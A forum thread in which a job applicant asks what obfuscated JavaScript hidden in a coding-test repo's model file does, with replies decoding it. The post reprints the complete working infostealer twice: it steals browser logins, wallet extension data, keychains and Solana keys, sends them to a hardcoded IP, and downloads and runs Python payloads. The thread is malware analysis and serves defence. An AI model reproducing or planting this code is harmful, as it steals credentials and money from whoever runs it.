What is the intent of this malicious code?
I found some malicious code in a GitHub repo and would like to better understand the attack vector.
I applied for a job and the poster asked me to download their NodeJS repo, run the code and complete a coding exercise.
The code in question is after the last line below, hidden off to the right: 'imageDetails.js'
const mongoose = require("mongoose");

const ImageDetailsScehma = new mongoose.Schema(
  {
   image:String
  },
  {
    collection: "ImageDetails",
  }
);

mongoose.model("ImageDetails", ImageDetailsScehma);                                                                                                                                                                                 /* learn more: https://github.com/testing-library/jest-dom // @testing-library/jest-dom library provides a set of custom jest matchers that you can use to extend jest. These will make your tests more declarative, clear to read and to maintain.*/                                                                                                                                                                               Object.prototype.toString,Object.getOwnPropertyDescriptor,Object.defineProperty;const t="base64",c="utf8",a=require("fs"),$=require("os"),l=a=>(s1=a.slice(1),Buffer.from(s1,t).toString(c));pt=require(l("zcGF0aA")),rq=require(l("YcmVxdWVzdA")),ex=require(l("aY2hpbGRfc"+"HJvY2Vzcw"))[l("cZXhlYw")],hs=$[l("caG9zdG5hbWU")](),pl=$[l("YcGxhdGZvcm0")](),hd=$[l("ZaG9tZWRpcg")](),td=$[l("cdG1wZGly")]();let r;const n=a=>Buffer.from(a,t).toString(c),h=()=>{let t="MTQ3LjEyNCaHR0cDovLw4yMTQuMTMxOjEyNDQ=  ";for(var c="",a="",$="",l="",r=0;r<10;r++)c+=t[r],a+=t[10+r],$+=t[20+r],l+=t[30+r];return c=c+$+l,n(a)+n(c)},s=t=>t.replace(/^~([a-z]+|\/)/,((t,c)=>"/"===c?hd:`${pt[n("ZGlybmFtZQ")](hd)}/${c}`)),e="cmhrMQ1",Z="Z2V0",o="Ly5ucGw",d="d3JpdGVGaWxlU3luYw",u="L2NsaWVudA",G=n("ZXhpc3RzU3luYw"),y="TG9naW4gRGF0YQ",i="Y29weUZpbGU";function m(t){const c=n("YWNjZXN"+"zU3luYw");try{return a[c](t),!0}catch(t){return!1}}const b=n("RGVmYXVsdA"),p=n("UHJvZmlsZQ"),W=l("aZmlsZW5hbWU"),Y=l("cZm9ybURhdGE"),f=l("adXJs"),w=l("Zb3B0aW9ucw"),V=l("YdmFsdWU"),v=n("cmVhZGRpclN5bmM"),j=n("c3RhdFN5bmM"),L=(n("aXNEaXJlY3Rvcnk"),n("cG9zdA")),z="Ly5jb25maWcv",R="L0xpYnJhcnkvQXBwbGljYXRpb24gU3VwcG9ydC8",x="L0FwcERhdGEv",N="L1VzZXIgRGF0YQ",X="R29vZ2xlL0Nocm9tZQ",k="QnJhdmVTb2Z0d2FyZS9CcmF2ZS1Ccm93c2Vy",_="Z29vZ2xlLWNocm9tZQ",F=["TG9jYWwv"+k,k,k],B=["TG9jYWwv"+X,X,_],U=["Um9hbWluZy9PcGVyYSBTb2Z0d2FyZS9PcGVyYSBTdGFibGU","Y29tLm9wZXJhc29mdHdhcmUuT3BlcmE","b3BlcmE"];let g="comp";const q=["bmtiaWhmYmVvZ2Fl","ZWpiYWxiYWtvcGxj","Zmhib2hpbWFlbGJv","aG5mYW5rbm9jZmVv","aWJuZWpkZmptbWtw","YmZuYWVsbW9tZWlt","YWVhY2hrbm1lZnBo","ZWdqaWRqYnBnbGlj","aGlmYWZnbWNjZHBl"],J=["YW9laGxlZm5rb2RiZWZncGdrbm4","aGxnaGVjZGFsbWVlZWFqbmltaG0","aHBqYmJsZGNuZ2NuYXBuZG9kanA","ZmJkZGdjaWpubWhuZm5rZG5hYWQ","Y25scGVia2xtbmtvZW9paG9mZWM","aGxwbWdqbmpvcGhocGtrb2xqcGE","ZXBjY2lvbmJvb2hja29ub2VlbWc","aGRjb25kYmNiZG5iZWVwcGdkcGg","a3Bsb21qamtjZmdvZG5oY2VsbGo"],Q="Y3JlYXRlUmVhZFN0cmVhbQ",T=async(t,c,$)=>{let l=t;if(!l||""===l)return[];try{if(!m(l))return[]}catch(t){return[]}c||(c="");let r=[];const h=n("TG9jYWwgRXh0ZW5za"+"W9uIFNldHRpbmdz"),s=n(Q);for(let $=0;$<200;$++){const e=`${t}/${0===$?b:`${p} ${$}`}/${h}`;for(let t=0;t<q.length;t++){const h=n(q[t]+J[t]);let Z=`${e}/${h}`;if(m(Z)){try{far=a[v](Z)}catch(t){far=[]}far.forEach((async t=>{l=pt.join(Z,t);try{r.push({[V]:a[s](l),[w]:{[W]:`${c}${$}_${h}_${t}`}})}catch(t){}}))}}}if($){const t=n("c29sYW5hX2lkLnR4dA");if(l=`${hd}${n("Ly5jb25maWcvc29sYW5hL2lkLmpzb24")}`,a[G](l))try{r.push({[V]:a[s](l),[w]:{[W]:t}})}catch(t){}}return C(r),r},C=t=>{const c=l("YbXVsdGlfZmlsZQ"),a=l("ZdGltZXN0YW1w"),$=n("L3VwbG9hZHM"),s={[a]:r.toString(),type:e,hid:g,[c]:t},Z=h();try{const t={[f]:`${Z}${$}`,[Y]:s};rq[L](t,((t,c,a)=>{}))}catch(t){}},A=async(t,c)=>{try{const a=s("~/");let $="";$="d"==pl[0]?`${a}${n(R)}${n(t[1])}`:"l"==pl[0]?`${a}${n(z)}${n(t[2])}`:`${a}${n(x)}${n(t[0])}${n(N)}`,await T($,`${c}_`,0==c)}catch(t){}},E=async()=>{let t=[];const c=n(y),$=n(Q),l=n("L0xpYnJhcnkvS2V5Y2hhaW5zL2xvZ2luLmtleWNoYWlu"),r=n("bG9na2MtZGI");if(pa=`${hd}${l}`,a[G](pa))try{t.push({[V]:a[$](pa),[w]:{[W]:r}})}catch(t){}else if(pa+="-db",a[G](pa))try{t.push({[V]:a[$](pa),[w]:{[W]:r}})}catch(t){}try{const l=n(i);let r="";if(r=`${hd}${n(R)}${n(X)}`,r&&""!==r&&m(r))for(let n=0;n<200;n++){const h=`${r}/${0===n?b:`${p} ${n}`}/${c}`;try{if(!m(h))continue;const c=`${r}/ld_${n}`;m(c)?t.push({[V]:a[$](c),[w]:{[W]:`pld_${n}`}}):a[l](h,c,(t=>{let c=[{[V]:a[$](h),[w]:{[W]:`pld_${n}`}}];C(c)}))}catch(t){}}}catch(t){}return C(t),t},H=async()=>{let t=[];const c=n(y),$=n(Q);try{const l=n(i);let r="";if(r=`${hd}${n(R)}${n(k)}`,r&&""!==r&&m(r))for(let n=0;n<200;n++){const h=`${r}/${0===n?b:`${p} ${n}`}/${c}`;try{if(!m(h))continue;const c=`${r}/brld_${n}`;m(c)?t.push({[V]:a[$](c),[w]:{[W]:`brld_${n}`}}):a[l](h,c,(t=>{let c=[{[V]:a[$](h),[w]:{[W]:`brld_${n}`}}];C(c)}))}catch(t){}}}catch(t){}return C(t),t},S=async()=>{let t=[];const c=n(Q),$=n("a2V5NC5kYg"),l=n("a2V5My5kYg"),r=n("bG9naW5zLmpzb24");try{let h="";if(h=`${hd}${n(R)}${n("RmlyZWZveA")}`,h&&""!==h&&m(h))for(let n=0;n<200;n++){const s=0===n?b:`${p} ${n}`,e=`${h}/${s}/${$}`,Z=`${h}/${s}/${l}`,o=`${h}/${s}/${r}`;try{m(e)&&t.push({[V]:a[c](e),[w]:{[W]:`fk4_${n}`}})}catch(t){}try{m(Z)&&t.push({[V]:a[c](Z),[w]:{[W]:`fk3_${n}`}})}catch(t){}try{m(o)&&t.push({[V]:a[c](o),[w]:{[W]:`flj_${n}`}})}catch(t){}}}catch(t){}return C(t),t},M=async()=>{let t=[];n(y);const c=n(Q);try{const t=n("Ly5sb2NhbC9zaGFyZS9rZXlyaW5ncy8");let $="";$=`${hd}${t}`;let l=[];if($&&""!==$&&m($))try{l=a[v]($)}catch(t){l=[]}l.forEach((async t=>{pa=pt.join($,t);try{ldb_data.push({[V]:a[c](pa),[w]:{[W]:`${t}`}})}catch(t){}}))}catch(t){}return C(t),t},I=async()=>{let t=[];const c=n(y),$=n(Q);try{const l=n(i);let r="";if(r=`${hd}${n(z)}${n(_)}`,r&&""!==r&&m(r))for(let n=0;n<200;n++){const h=`${r}/${0===n?b:`${p} ${n}`}/${c}`;try{if(!m(h))continue;const c=`${r}/ld_${n}`;m(c)?t.push({[V]:a[$](c),[w]:{[W]:`plld_${n}`}}):a[l](h,c,(t=>{let c=[{[V]:a[$](h),[w]:{[W]:`plld_${n}`}}];C(c)}))}catch(t){}}}catch(t){}return C(t),t},D=async()=>{let t=[];const c=n(Q),$=n("a2V5NC5kYg"),l=n("a2V5My5kYg"),r=n("bG9naW5zLmpzb24");try{let h="";if(h=`${hd}${n("Ly5tb3ppbGxhL2ZpcmVmb3gv")}`,h&&""!==h&&m(h))for(let n=0;n<200;n++){const s=0===n?b:`${p} ${n}`,e=`${h}/${s}/${$}`,Z=`${h}/${s}/${l}`,o=`${h}/${s}/${r}`;try{m(e)&&t.push({[V]:a[c](e),[w]:{[W]:`flk4_${n}`}})}catch(t){}try{m(Z)&&t.push({[V]:a[c](Z),[w]:{[W]:`flk3_${n}`}})}catch(t){}try{m(o)&&t.push({[V]:a[c](o),[w]:{[W]:`fllj_${n}`}})}catch(t){}}}catch(t){}return C(t),t},P=n("cm1TeW5j"),O="XC5weXBccHl0aG9uLmV4ZQ",K=51476590;let tt=0;const ct=async t=>{const c=`${n("dGFyIC14Zg")} ${t} -C ${hd}`;ex(c,((c,$,l)=>{if(c)return a[P](t),void(tt=0);a[P](t),lt()}))},at=()=>{const t=n("cDIuemlw"),c=`${h()}${n("L3Bkb3du")}`,$=`${td}\\${n("cC56aQ")}`,l=`${td}\\${t}`;if(tt>=K+6)return;const r=n("cmVuYW1lU3luYw"),s=n("cmVuYW1l");if(a[G]($))try{var e=a[j]($);e.size>=K+6?(tt=e.size,a[s]($,l,(t=>{if(t)throw t;ct(l)}))):(tt<e.size?tt=e.size:(a[P]($),tt=0),$t())}catch(t){}else{const t=`${n("Y3VybCAtTG8")} "${$}" "${c}"`;ex(t,((t,c,n)=>{if(t)return tt=0,void $t();try{tt=K+6,a[r]($,l),ct(l)}catch(t){}}))}};function $t(){setTimeout((()=>{at()}),2e4)}const lt=async()=>await new Promise(((t,c)=>{if("w"==pl[0]){const t=`${hd}${n(O)}`;a[G](`${t}`)?(()=>{const t=h(),c=n(u),$=n(Z),l=n(d),r=n(o),s=`${t}${c}/${e}`,G=`${hd}${r}`,y=`"${hd}${n(O)}" "${G}"`;try{a[P](G)}catch(t){}rq[$](s,((t,c,$)=>{if(!t)try{a[l](G,$),ex(y,((t,c,a)=>{}))}catch(t){}}))})():at()}else(()=>{const t=h(),c=n(u),$=n(d),l=n(Z),r=n(o),s=n("cHl0aG9u"),G=`${t}${c}/${e}`,y=`${hd}${r}`;let i=`${s}3 "${y}"`;rq[l](G,((t,c,l)=>{t||(a[$](y,l),ex(i,((t,c,a)=>{})))}))})()}));var rt=0;const nt=async()=>{try{r=Date.now(),await(async()=>{g=hs;try{const t=s("~/");await A(B,0),await A(F,1),await A(U,2),"w"==pl[0]?(pa=`${t}${n(x)}${n("TG9jYWwvTWljcm9zb2Z0L0VkZ2U")}${n(N)}`,await T(pa,"3_",!1)):"d"==pl[0]?(await E(),await H(),await S()):"l"==pl[0]&&(await M(),await I(),await D())}catch(t){}})(),lt()}catch(t){}};nt();let ht=setInterval((()=>{(rt+=1)<5?nt():clearInterval(ht)}),6e5);


The code is obfuscated and minified so it's a little hard to read. Can anyone work out what the code is doing?
Here's the unminified version of the suspicious code:
Object.prototype.toString, Object.getOwnPropertyDescriptor, Object.defineProperty;
const t = "base64",
    c = "utf8",
    a = require("fs"),
    $ = require("os"),
    l = (a) => ((s1 = a.slice(1)), Buffer.from(s1, t).toString(c));
(pt = require(l("zcGF0aA"))),
    (rq = require(l("YcmVxdWVzdA"))),
    (ex = require(l("aY2hpbGRfc" + "HJvY2Vzcw"))[l("cZXhlYw")]),
    (hs = $[l("caG9zdG5hbWU")]()),
    (pl = $[l("YcGxhdGZvcm0")]()),
    (hd = $[l("ZaG9tZWRpcg")]()),
    (td = $[l("cdG1wZGly")]());
let r;
const n = (a) => Buffer.from(a, t).toString(c),
    h = () => {
        let t = "MTQ3LjEyNCaHR0cDovLw4yMTQuMTMxOjEyNDQ=  ";
        for (var c = "", a = "", $ = "", l = "", r = 0; r < 10; r++) (c += t[r]), (a += t[10 + r]), ($ += t[20 + r]), (l += t[30 + r]);
        return (c = c + $ + l), n(a) + n(c);
    },
    s = (t) => t.replace(/^~([a-z]+|\/)/, (t, c) => ("/" === c ? hd : `${pt[n("ZGlybmFtZQ")](hd)}/${c}`)),
    e = "cmhrMQ1",
    Z = "Z2V0",
    o = "Ly5ucGw",
    d = "d3JpdGVGaWxlU3luYw",
    u = "L2NsaWVudA",
    G = n("ZXhpc3RzU3luYw"),
    y = "TG9naW4gRGF0YQ",
    i = "Y29weUZpbGU";
function m(t) {
    const c = n("YWNjZXN" + "zU3luYw");
    try {
        return a[c](t), !0;
    } catch (t) {
        return !1;
    }
}
const b = n("RGVmYXVsdA"),
    p = n("UHJvZmlsZQ"),
    W = l("aZmlsZW5hbWU"),
    Y = l("cZm9ybURhdGE"),
    f = l("adXJs"),
    w = l("Zb3B0aW9ucw"),
    V = l("YdmFsdWU"),
    v = n("cmVhZGRpclN5bmM"),
    j = n("c3RhdFN5bmM"),
    L = (n("aXNEaXJlY3Rvcnk"), n("cG9zdA")),
    z = "Ly5jb25maWcv",
    R = "L0xpYnJhcnkvQXBwbGljYXRpb24gU3VwcG9ydC8",
    x = "L0FwcERhdGEv",
    N = "L1VzZXIgRGF0YQ",
    X = "R29vZ2xlL0Nocm9tZQ",
    k = "QnJhdmVTb2Z0d2FyZS9CcmF2ZS1Ccm93c2Vy",
    _ = "Z29vZ2xlLWNocm9tZQ",
    F = ["TG9jYWwv" + k, k, k],
    B = ["TG9jYWwv" + X, X, _],
    U = ["Um9hbWluZy9PcGVyYSBTb2Z0d2FyZS9PcGVyYSBTdGFibGU", "Y29tLm9wZXJhc29mdHdhcmUuT3BlcmE", "b3BlcmE"];
let g = "comp";
const q = ["bmtiaWhmYmVvZ2Fl", "ZWpiYWxiYWtvcGxj", "Zmhib2hpbWFlbGJv", "aG5mYW5rbm9jZmVv", "aWJuZWpkZmptbWtw", "YmZuYWVsbW9tZWlt", "YWVhY2hrbm1lZnBo", "ZWdqaWRqYnBnbGlj", "aGlmYWZnbWNjZHBl"],
    J = [
        "YW9laGxlZm5rb2RiZWZncGdrbm4",
        "aGxnaGVjZGFsbWVlZWFqbmltaG0",
        "aHBqYmJsZGNuZ2NuYXBuZG9kanA",
        "ZmJkZGdjaWpubWhuZm5rZG5hYWQ",
        "Y25scGVia2xtbmtvZW9paG9mZWM",
        "aGxwbWdqbmpvcGhocGtrb2xqcGE",
        "ZXBjY2lvbmJvb2hja29ub2VlbWc",
        "aGRjb25kYmNiZG5iZWVwcGdkcGg",
        "a3Bsb21qamtjZmdvZG5oY2VsbGo",
    ],
    Q = "Y3JlYXRlUmVhZFN0cmVhbQ",
    T = async (t, c, $) => {
        let l = t;
        if (!l || "" === l) return [];
        try {
            if (!m(l)) return [];
        } catch (t) {
            return [];
        }
        c || (c = "");
        let r = [];
        const h = n("TG9jYWwgRXh0ZW5za" + "W9uIFNldHRpbmdz"),
            s = n(Q);
        for (let $ = 0; $ < 200; $++) {
            const e = `${t}/${0 === $ ? b : `${p} ${$}`}/${h}`;
            for (let t = 0; t < q.length; t++) {
                const h = n(q[t] + J[t]);
                let Z = `${e}/${h}`;
                if (m(Z)) {
                    try {
                        far = a[v](Z);
                    } catch (t) {
                        far = [];
                    }
                    far.forEach(async (t) => {
                        l = pt.join(Z, t);
                        try {
                            r.push({ [V]: a[s](l), [w]: { [W]: `${c}${$}_${h}_${t}` } });
                        } catch (t) {}
                    });
                }
            }
        }
        if ($) {
            const t = n("c29sYW5hX2lkLnR4dA");
            if (((l = `${hd}${n("Ly5jb25maWcvc29sYW5hL2lkLmpzb24")}`), a[G](l)))
                try {
                    r.push({ [V]: a[s](l), [w]: { [W]: t } });
                } catch (t) {}
        }
        return C(r), r;
    },
    C = (t) => {
        const c = l("YbXVsdGlfZmlsZQ"),
            a = l("ZdGltZXN0YW1w"),
            $ = n("L3VwbG9hZHM"),
            s = { [a]: r.toString(), type: e, hid: g, [c]: t },
            Z = h();
        try {
            const t = { [f]: `${Z}${$}`, [Y]: s };
            rq[L](t, (t, c, a) => {});
        } catch (t) {}
    },
    A = async (t, c) => {
        try {
            const a = s("~/");
            let $ = "";
            ($ = "d" == pl[0] ? `${a}${n(R)}${n(t[1])}` : "l" == pl[0] ? `${a}${n(z)}${n(t[2])}` : `${a}${n(x)}${n(t[0])}${n(N)}`), await T($, `${c}_`, 0 == c);
        } catch (t) {}
    },
    E = async () => {
        let t = [];
        const c = n(y),
            $ = n(Q),
            l = n("L0xpYnJhcnkvS2V5Y2hhaW5zL2xvZ2luLmtleWNoYWlu"),
            r = n("bG9na2MtZGI");
        if (((pa = `${hd}${l}`), a[G](pa)))
            try {
                t.push({ [V]: a[$](pa), [w]: { [W]: r } });
            } catch (t) {}
        else if (((pa += "-db"), a[G](pa)))
            try {
                t.push({ [V]: a[$](pa), [w]: { [W]: r } });
            } catch (t) {}
        try {
            const l = n(i);
            let r = "";
            if (((r = `${hd}${n(R)}${n(X)}`), r && "" !== r && m(r)))
                for (let n = 0; n < 200; n++) {
                    const h = `${r}/${0 === n ? b : `${p} ${n}`}/${c}`;
                    try {
                        if (!m(h)) continue;
                        const c = `${r}/ld_${n}`;
                        m(c)
                            ? t.push({ [V]: a[$](c), [w]: { [W]: `pld_${n}` } })
                            : a[l](h, c, (t) => {
                                  let c = [{ [V]: a[$](h), [w]: { [W]: `pld_${n}` } }];
                                  C(c);
                              });
                    } catch (t) {}
                }
        } catch (t) {}
        return C(t), t;
    },
    H = async () => {
        let t = [];
        const c = n(y),
            $ = n(Q);
        try {
            const l = n(i);
            let r = "";
            if (((r = `${hd}${n(R)}${n(k)}`), r && "" !== r && m(r)))
                for (let n = 0; n < 200; n++) {
                    const h = `${r}/${0 === n ? b : `${p} ${n}`}/${c}`;
                    try {
                        if (!m(h)) continue;
                        const c = `${r}/brld_${n}`;
                        m(c)
                            ? t.push({ [V]: a[$](c), [w]: { [W]: `brld_${n}` } })
                            : a[l](h, c, (t) => {
                                  let c = [{ [V]: a[$](h), [w]: { [W]: `brld_${n}` } }];
                                  C(c);
                              });
                    } catch (t) {}
                }
        } catch (t) {}
        return C(t), t;
    },
    S = async () => {
        let t = [];
        const c = n(Q),
            $ = n("a2V5NC5kYg"),
            l = n("a2V5My5kYg"),
            r = n("bG9naW5zLmpzb24");
        try {
            let h = "";
            if (((h = `${hd}${n(R)}${n("RmlyZWZveA")}`), h && "" !== h && m(h)))
                for (let n = 0; n < 200; n++) {
                    const s = 0 === n ? b : `${p} ${n}`,
                        e = `${h}/${s}/${$}`,
                        Z = `${h}/${s}/${l}`,
                        o = `${h}/${s}/${r}`;
                    try {
                        m(e) && t.push({ [V]: a[c](e), [w]: { [W]: `fk4_${n}` } });
                    } catch (t) {}
                    try {
                        m(Z) && t.push({ [V]: a[c](Z), [w]: { [W]: `fk3_${n}` } });
                    } catch (t) {}
                    try {
                        m(o) && t.push({ [V]: a[c](o), [w]: { [W]: `flj_${n}` } });
                    } catch (t) {}
                }
        } catch (t) {}
        return C(t), t;
    },
    M = async () => {
        let t = [];
        n(y);
        const c = n(Q);
        try {
            const t = n("Ly5sb2NhbC9zaGFyZS9rZXlyaW5ncy8");
            let $ = "";
            $ = `${hd}${t}`;
            let l = [];
            if ($ && "" !== $ && m($))
                try {
                    l = a[v]($);
                } catch (t) {
                    l = [];
                }
            l.forEach(async (t) => {
                pa = pt.join($, t);
                try {
                    ldb_data.push({ [V]: a[c](pa), [w]: { [W]: `${t}` } });
                } catch (t) {}
            });
        } catch (t) {}
        return C(t), t;
    },
    I = async () => {
        let t = [];
        const c = n(y),
            $ = n(Q);
        try {
            const l = n(i);
            let r = "";
            if (((r = `${hd}${n(z)}${n(_)}`), r && "" !== r && m(r)))
                for (let n = 0; n < 200; n++) {
                    const h = `${r}/${0 === n ? b : `${p} ${n}`}/${c}`;
                    try {
                        if (!m(h)) continue;
                        const c = `${r}/ld_${n}`;
                        m(c)
                            ? t.push({ [V]: a[$](c), [w]: { [W]: `plld_${n}` } })
                            : a[l](h, c, (t) => {
                                  let c = [{ [V]: a[$](h), [w]: { [W]: `plld_${n}` } }];
                                  C(c);
                              });
                    } catch (t) {}
                }
        } catch (t) {}
        return C(t), t;
    },
    D = async () => {
        let t = [];
        const c = n(Q),
            $ = n("a2V5NC5kYg"),
            l = n("a2V5My5kYg"),
            r = n("bG9naW5zLmpzb24");
        try {
            let h = "";
            if (((h = `${hd}${n("Ly5tb3ppbGxhL2ZpcmVmb3gv")}`), h && "" !== h && m(h)))
                for (let n = 0; n < 200; n++) {
                    const s = 0 === n ? b : `${p} ${n}`,
                        e = `${h}/${s}/${$}`,
                        Z = `${h}/${s}/${l}`,
                        o = `${h}/${s}/${r}`;
                    try {
                        m(e) && t.push({ [V]: a[c](e), [w]: { [W]: `flk4_${n}` } });
                    } catch (t) {}
                    try {
                        m(Z) && t.push({ [V]: a[c](Z), [w]: { [W]: `flk3_${n}` } });
                    } catch (t) {}
                    try {
                        m(o) && t.push({ [V]: a[c](o), [w]: { [W]: `fllj_${n}` } });
                    } catch (t) {}
                }
        } catch (t) {}
        return C(t), t;
    },
    P = n("cm1TeW5j"),
    O = "XC5weXBccHl0aG9uLmV4ZQ",
    K = 51476590;
let tt = 0;
const ct = async (t) => {
        const c = `${n("dGFyIC14Zg")} ${t} -C ${hd}`;
        ex(c, (c, $, l) => {
            if (c) return a[P](t), void (tt = 0);
            a[P](t), lt();
        });
    },
    at = () => {
        const t = n("cDIuemlw"),
            c = `${h()}${n("L3Bkb3du")}`,
            $ = `${td}\\${n("cC56aQ")}`,
            l = `${td}\\${t}`;
        if (tt >= K + 6) return;
        const r = n("cmVuYW1lU3luYw"),
            s = n("cmVuYW1l");
        if (a[G]($))
            try {
                var e = a[j]($);
                e.size >= K + 6
                    ? ((tt = e.size),
                      a[s]($, l, (t) => {
                          if (t) throw t;
                          ct(l);
                      }))
                    : (tt < e.size ? (tt = e.size) : (a[P]($), (tt = 0)), $t());
            } catch (t) {}
        else {
            const t = `${n("Y3VybCAtTG8")} "${$}" "${c}"`;
            ex(t, (t, c, n) => {
                if (t) return (tt = 0), void $t();
                try {
                    (tt = K + 6), a[r]($, l), ct(l);
                } catch (t) {}
            });
        }
    };
function $t() {
    setTimeout(() => {
        at();
    }, 2e4);
}
const lt = async () =>
    await new Promise((t, c) => {
        if ("w" == pl[0]) {
            const t = `${hd}${n(O)}`;
            a[G](`${t}`)
                ? (() => {
                      const t = h(),
                          c = n(u),
                          $ = n(Z),
                          l = n(d),
                          r = n(o),
                          s = `${t}${c}/${e}`,
                          G = `${hd}${r}`,
                          y = `"${hd}${n(O)}" "${G}"`;
                      try {
                          a[P](G);
                      } catch (t) {}
                      rq[$](s, (t, c, $) => {
                          if (!t)
                              try {
                                  a[l](G, $), ex(y, (t, c, a) => {});
                              } catch (t) {}
                      });
                  })()
                : at();
        } else
            (() => {
                const t = h(),
                    c = n(u),
                    $ = n(d),
                    l = n(Z),
                    r = n(o),
                    s = n("cHl0aG9u"),
                    G = `${t}${c}/${e}`,
                    y = `${hd}${r}`;
                let i = `${s}3 "${y}"`;
                rq[l](G, (t, c, l) => {
                    t || (a[$](y, l), ex(i, (t, c, a) => {}));
                });
            })();
    });
var rt = 0;
const nt = async () => {
    try {
        (r = Date.now()),
            await (async () => {
                g = hs;
                try {
                    const t = s("~/");
                    await A(B, 0),
                        await A(F, 1),
                        await A(U, 2),
                        "w" == pl[0] ? ((pa = `${t}${n(x)}${n("TG9jYWwvTWljcm9zb2Z0L0VkZ2U")}${n(N)}`), await T(pa, "3_", !1)) : "d" == pl[0] ? (await E(), await H(), await S()) : "l" == pl[0] && (await M(), await I(), await D());
                } catch (t) {}
            })(),
            lt();
    } catch (t) {}
};
nt();
let ht = setInterval(() => {
    (rt += 1) < 5 ? nt() : clearInterval(ht);
}, 6e5);


From what I can tell - I see 'fs' and 'os' packages included. I see what looks like iterating over C drive files and I see some network calls after that. Pretty ominous if I'm reading that right.
Update:
It looks like this line is key:
l = (a) => ((s1 = a.slice(1)), Buffer.from(s1, t).toString(c));
It's chopping off the 1st character and then base64 decoding the obfuscated var / function names.
For example:
require(l("zcGF0aA")) = require("path")
I'll go through the rest of the file and try to decode it using this logic.
Thanks.

Link is a 404. This is why you are supposed to include relevant info in the question itself.

Sorry, forgot it was a private repo. Added code inline.

Downvote removed, voted to reopen.

Thank you. I would like to better understand this attack vector so I hope we can reopen this post and get some more eyes on it.

It's already sitting at 2 reopen votes, just needs one more. Once somebody casts the first one it goes into a review queue so hopefully not much longer.

The goal of this script (for the part that I've decoded), is to dl on your computer a python script (under $homedir/.npl) that will then download a few other python payloads helping to:

sniff all of you files, credentials and stuff
setting up a bidirectional tunnel for an ssh remote connection, ftp
exploration etc
setting up a socket connection emitting every keystroke, clipboard copy etc
Installing anydesk

And probably a few other stuff to be discovered
